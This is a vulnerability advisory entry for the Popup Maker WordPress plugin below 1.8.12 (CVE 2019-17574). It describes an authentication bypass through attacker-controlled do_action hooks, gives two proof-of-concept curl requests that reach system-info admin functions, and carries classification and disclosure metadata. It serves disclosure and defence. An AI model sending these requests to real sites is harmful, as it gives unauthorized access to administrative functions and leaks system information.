Popup-Maker < 1.8.12 - Multiple Vulnerabilities



Description
An attacker can partially control the arguments of the do_action, during the initialization of the PUM_Site . Because of this, an attacker can call any method which contains an action starting from popmake_ or pum_ . This will lead to successful execution of functions which do not require arguments (e.g: PUM_Admin_Tools::sysinfo_download or PUM_Admin_Tools::sysinfo_display) or require one argument as an array.
Proof of Concept
curl http://www.your-domain-with-popup-maker.com/?pum_action=tools_page_tab_system_info


curl -v -d “popmake_action=popup_sysinfo&popmake-sysinfo=choose any content you like” -X POST http://www.your-domain-with-popup-maker.com/

Affects Plugin

fixed in version 1.8.13

References

CVE 2019-17574
URL https://blog.redyops.com/wordpress-plugin-popup-maker/

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Original Researcher Dimopoulos Ilias
Submitter Dimopoulos Ilias
Submitter Website https://redyops.com/
Views 4088
Verified No
WPVDB ID 9907

Timeline

Publicly Published 2019-10-14 (about 1 month ago)
Added 2019-10-14 (about 1 month ago)
Last Updated 2019-10-14 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin